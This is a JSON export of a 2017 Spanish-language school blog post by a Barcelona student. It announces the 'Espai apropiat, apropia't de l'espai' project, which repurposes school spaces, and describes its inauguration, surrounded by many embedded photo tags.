{"id":2774,"date":"2017-02-07T17:00:58","date_gmt":"2017-02-07T16:00:58","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2774"},"modified":"2018-05-06T07:13:29","modified_gmt":"2018-05-06T05:13:29","slug":"arranque-de-un-proyecto-innovador-en-nuestro-instituto","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/","title":{"rendered":"Arranque de un proyecto innovador en nuestro instituto"},"content":{"rendered":"<p>Aar\u00f3n Rafael Fortoul ___\u00a0[ 2\u00ba Bachillerato B ]<\/p>\n<p>El programa educativo y cultural Interf\u00edcies, ubicado en el <a href=\"http:\/\/artssantamonica.gencat.cat\/ca\/\" target=\"_blank\">centro Arts Santa M\u00f2nica<\/a>, ha gestado un proyecto innovador que se llevar\u00e1 a cabo en tres centros educativos\u00a0de Barcelona durante el segundo trimestre de 2017.<\/p>\n<p>Este proyecto que lleva por nombre &#8220;<strong><a href=\"https:\/\/espaiapropiat.wordpress.com\/\" target=\"_blank\">Espai apropiat, apropia&#8217;t de l&#8217;espai<\/a><\/strong>&#8220;, intentar\u00e1 darle nuevos usos a los espacios p\u00fablicos (en este caso, de los centros educativos) en beneficio de los usuarios e usuarias, que decidir\u00e1n su funcionalidad mediante encuestas que el profesorado repartir\u00e1 en cada centro.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/img_20161119_113218\/\" rel=\"attachment wp-att-2812\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2812 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161119_113218-300x169.jpg\" alt=\"img_20161119_113218\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161119_113218-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161119_113218-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161119_113218-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161119_113218.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/img_20161126_131607\/\" rel=\"attachment wp-att-2813\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2813\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161126_131607-300x169.jpg\" alt=\"img_20161126_131607\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161126_131607-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161126_131607-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161126_131607-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161126_131607.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2797\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella-1-300x225.jpg\" alt=\"foto-enviada-per-francesc-casabella-1\" width=\"225\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella-1-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella-1-768x576.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella-1-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella-1-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Foto-enviada-per-Francesc-Casabella-1.jpg 1600w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/img_20161209_104451\/\" rel=\"attachment wp-att-2814\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2814\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161209_104451-300x169.jpg\" alt=\"img_20161209_104451\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161209_104451-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161209_104451-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161209_104451-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161209_104451.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2809\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_215807-265x300.jpg\" alt=\"img_20161212_215807\" width=\"149\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_215807-265x300.jpg 265w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_215807-768x869.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_215807-905x1024.jpg 905w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_215807.jpg 1134w\" sizes=\"auto, (max-width: 149px) 100vw, 149px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2805\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_215906-245x300.jpg\" alt=\"img_20161212_215906\" width=\"138\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_215906-245x300.jpg 245w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_215906-768x941.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_215906-835x1024.jpg 835w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_215906.jpg 1134w\" sizes=\"auto, (max-width: 138px) 100vw, 138px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/img_20161212_220005\/\" rel=\"attachment wp-att-2815\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2815\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_220005-300x184.jpg\" alt=\"img_20161212_220005\" width=\"276\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_220005-300x184.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_220005-768x470.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_220005-1024x627.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161212_220005.jpg 1134w\" sizes=\"auto, (max-width: 276px) 100vw, 276px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/img_20161214_093355\/\" rel=\"attachment wp-att-2816\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2816\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_093355-300x169.jpg\" alt=\"img_20161214_093355\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_093355-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_093355-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_093355-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_093355.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/kevindbt-copia\/\" rel=\"attachment wp-att-2801\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2801\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/kevindbt-copia-300x150.png\" alt=\"kevindbt-copia\" width=\"337\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/kevindbt-copia-300x150.png 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/kevindbt-copia-768x385.png 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/kevindbt-copia.png 898w\" sizes=\"auto, (max-width: 337px) 100vw, 337px\" \/><\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/img_20161214_093355\/\" rel=\"attachment wp-att-2816\">\u00a0<\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/marlon\/\" rel=\"attachment wp-att-2817\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2817\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Marlon-300x150.png\" alt=\"marlon\" width=\"338\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Marlon-300x150.png 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Marlon-768x384.png 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Marlon.png 852w\" sizes=\"auto, (max-width: 338px) 100vw, 338px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2798\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161209_104423-300x169.jpg\" alt=\"img_20161209_104423\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161209_104423-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161209_104423-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161209_104423-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161209_104423.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/sara-1\/\" rel=\"attachment wp-att-2802\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2802\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Sara-1-300x150.jpg\" alt=\"sara-1\" width=\"338\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Sara-1-300x150.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Sara-1-768x384.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Sara-1-1024x512.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Sara-1.jpg 1079w\" sizes=\"auto, (max-width: 338px) 100vw, 338px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/enric\/\" rel=\"attachment wp-att-2818\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2818\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Enric-300x150.png\" alt=\"enric\" width=\"338\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Enric-300x150.png 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/Enric.png 754w\" sizes=\"auto, (max-width: 338px) 100vw, 338px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/dsc05765\/\" rel=\"attachment wp-att-2806\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2806\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05765-300x215.jpg\" alt=\"dsc05765\" width=\"300\" height=\"215\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05765-300x215.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05765-768x551.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05765.jpg 872w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/dsc05766\/\" rel=\"attachment wp-att-2807\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2807\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05766-300x213.jpg\" alt=\"dsc05766\" width=\"300\" height=\"213\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05766-300x213.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05766-768x545.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05766.jpg 841w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/dsc05767\/\" rel=\"attachment wp-att-2808\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2808\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05767-300x216.jpg\" alt=\"dsc05767\" width=\"300\" height=\"216\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05767-300x216.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05767-768x554.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05767.jpg 842w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Nuestro instituto es el primero de los tres centros participantes del proyecto. La inauguraci\u00f3n se celebr\u00f3 el pasado 6 de Febrero a las 16:30, evento en el cual participaron alumnos y profesores que contribuyeron al proyecto, seguido de una peque\u00f1a actuaci\u00f3n del <a href=\"http:\/\/teartecd100.tumblr.com\/\" target=\"_blank\">Taller del Teatro<\/a> del centro.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2799\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_115530-300x169.jpg\" alt=\"img_20161214_115530\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_115530-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_115530-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_115530-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_115530.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/img_20161215_142108\/\" rel=\"attachment wp-att-2825\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2825\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161215_142108-300x169.jpg\" alt=\"img_20161215_142108\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161215_142108-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161215_142108-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161215_142108-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161215_142108.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/img_20161215_140826\/\" rel=\"attachment wp-att-2826\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2826\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161215_140826-300x169.jpg\" alt=\"img_20161215_140826\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161215_140826-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161215_140826-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161215_140826-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161215_140826.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/dsc04149\/\" rel=\"attachment wp-att-2824\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2824\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC04149-300x200.jpg\" alt=\"dsc04149\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC04149-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC04149-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC04149.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2822\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05380-300x200.jpg\" alt=\"dsc05380\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05380-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05380-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05380.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2787\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/C\u00f2pia-de-IMG_20170203_095523-300x169.jpg\" alt=\"copia-de-img_20170203_095523\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/C\u00f2pia-de-IMG_20170203_095523-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/C\u00f2pia-de-IMG_20170203_095523-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/C\u00f2pia-de-IMG_20170203_095523-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/C\u00f2pia-de-IMG_20170203_095523.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/dsc05433\/\" rel=\"attachment wp-att-2789\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2789\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05433-300x200.jpg\" alt=\"dsc05433\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05433-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05433-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05433.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/dsc05466\/\" rel=\"attachment wp-att-2790\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2790\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05466-300x200.jpg\" alt=\"dsc05466\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05466-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05466-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05466.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/dsc05496\/\" rel=\"attachment wp-att-2791\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2791\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05496-300x200.jpg\" alt=\"dsc05496\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05496-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05496-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05496.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Este nuevo espacio estar\u00e1 dos semanas en funcionamiento. Despu\u00e9s rotar\u00e1 hacia la <a href=\"https:\/\/agora.xtec.cat\/ceip-collaso\/\" target=\"_blank\">Escuela Collaso y Gil<\/a>, y finalmente, en la <a href=\"http:\/\/agora.xtec.cat\/ceip-diputacio\/\" target=\"_blank\">Escola Diputaci\u00f3<\/a>. Mientras tanto, el proyecto estar\u00e1 siendo evaluado por los usuarios para comprobar si cumple sus objetivos propuestos.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/arranque-de-un-proyecto-innovador-en-nuestro-instituto\/attachment\/img_20161214_123036-2\/\" rel=\"attachment wp-att-2800\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2800\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_123036-1-300x169.jpg\" alt=\"img_20161214_123036\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_123036-1-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_123036-1-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_123036-1-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/IMG_20161214_123036-1.jpg 1134w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2792\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05555-1-300x200.jpg\" alt=\"dsc05555\" width=\"253\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05555-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05555-1-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/DSC05555-1.jpg 938w\" sizes=\"auto, (max-width: 253px) 100vw, 253px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2788\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/C\u00f2pia-de-IMG_20170203_123454-300x169.jpg\" alt=\"copia-de-img_20170203_123454\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/02\/C\u00f2pia-de-IMG_20170203_123454-300x169.jpg 300w, 